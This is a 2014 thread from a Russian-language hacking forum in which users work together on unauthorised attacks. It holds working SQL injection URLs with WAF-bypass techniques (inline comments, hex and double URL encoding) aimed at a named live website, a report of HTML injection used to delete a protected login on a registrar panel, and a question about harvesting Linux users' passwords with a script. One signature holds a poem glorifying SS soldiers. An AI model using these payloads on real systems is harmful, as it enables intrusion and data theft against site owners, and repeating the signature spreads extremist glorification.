ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.11.2014, 13:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 755326
Репутация:
99
|
|
всем привет
что это за вид уязвимости такой ? как он называется ?
нашёл видео - которое показывает такой метод, на укозе правда, но если он действует в разных ситуациях: https://www.youtube.com/watch?v=0I5FnjP_m0U
я таким образом удалил основной email Логин в панели управления доменом https://ru.domaincontext.com - который по идеи не удаляется
|
|
|
|

14.11.2014, 14:47
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от GAiN
GAiN said:
всем привет
что это за вид уязвимости такой ? как он называется ?
нашёл видео - которое показывает такой метод, на укозе правда, но если он действует в разных ситуациях:
https://www.youtube.com/watch?v=0I5FnjP_m0U
я таким образом удалил основной email Логин в панели управления доменом https://ru.domaincontext.com - который по идеи не удаляется
HTML-Injection
|
|
|

15.11.2014, 05:19
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Реально ли сделать так, чтобы если кто-то в консоли linux запустил bash-скрипт или программу, то этот скрипт сохранил бы пароль текущего юзера куда-нибудь в файл? Или что можно сделать, чтобы получить пароль таким образом?
|
|
|

15.11.2014, 12:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 36068
Репутация:
0
|
|
Код:
Code:
ht tp://w ww.vijp hoto.com/ind ex2.php?catid=47' AN D 1989=198 9 AN D 'IhRi'='IhRi
не получается слить инфу скулмапом, т.к. получаю постоянно 406 Not Acceptable. Что-то вроде waf. Как обойти? Помогите плиз, оч важно
|
|
|
|

15.11.2014, 15:47
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
часто бывает в джумле стоит какой-то модуль для защиты от sql инъекций. определил что реагирует на "jos". если оно встречается, то появляется:
Сообщение от None
403: Access Forbidden
Attempted SQL injection in REQUEST_URI
пробовал шаманить - ничего не получилось. мб подскажет кто как можно обойти ?)
|
|
|

15.11.2014, 19:43
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
часто бывает в джумле стоит какой-то модуль для защиты от sql инъекций. определил что реагирует на "jos". если оно встречается, то появляется:
пробовал шаманить - ничего не получилось. мб подскажет кто как можно обойти ?)
HEX, URL-encode, Double URL-encode
Смотря в каком месте
select * from %6aos_users
select * from %256aos_users
select * from information_schema.table where table_name=0x6a6f735f7573657273
|
|
|

16.11.2014, 12:09
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
или имя префикса замени на %23__
Сообщение от vikler
vikler said:
Код:
Code:
ht tp://w ww.vijp hoto.com/ind ex2.php?catid=47' AN D 1989=198 9 AN D 'IhRi'='IhRi
не получается слить инфу скулмапом, т.к. получаю постоянно 406 Not Acceptable. Что-то вроде waf. Как обойти? Помогите плиз, оч важно
максимум до чего дошел:
Код:
Code:
http://www.vijphoto.com/index2.php?id=-73+union%c0%4aselect+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/--+
но вывода нет, хотя и запрос корректный вроде
blind:
Код:
Code:
http://www.vijphoto.com/index2.php?id=73+and+substring(version(),1,1)=5--+
|
|
|

16.11.2014, 14:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 36068
Репутация:
0
|
|
Сообщение от faza02
faza02 said:
или имя префикса замени на %23__
максимум до чего дошел:
Код:
Code:
http://www.vijphoto.com/index2.php?id=-73+union%c0%4aselect+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/--+
но вывода нет, хотя и запрос корректный вроде
blind:
Код:
Code:
http://www.vijphoto.com/index2.php?id=73+and+substring(version(),1,1)=5--+
хм, то есть ничего не сделаешь, так?
|
|
|
|

16.11.2014, 14:34
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от vikler
vikler said:
хм, то есть ничего не сделаешь, так?
я пока пытаюсь обойти фильтрацию, а вам я предложил - раскручивайте, как слепую
|
|
|

16.11.2014, 15:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Сообщение от vikler
vikler said:
хм, то есть ничего не сделаешь, так?
Сообщение от None
http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/--+
а так не?
и смотри наверх... в тайтле вывод. 6 рентабельное поле
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|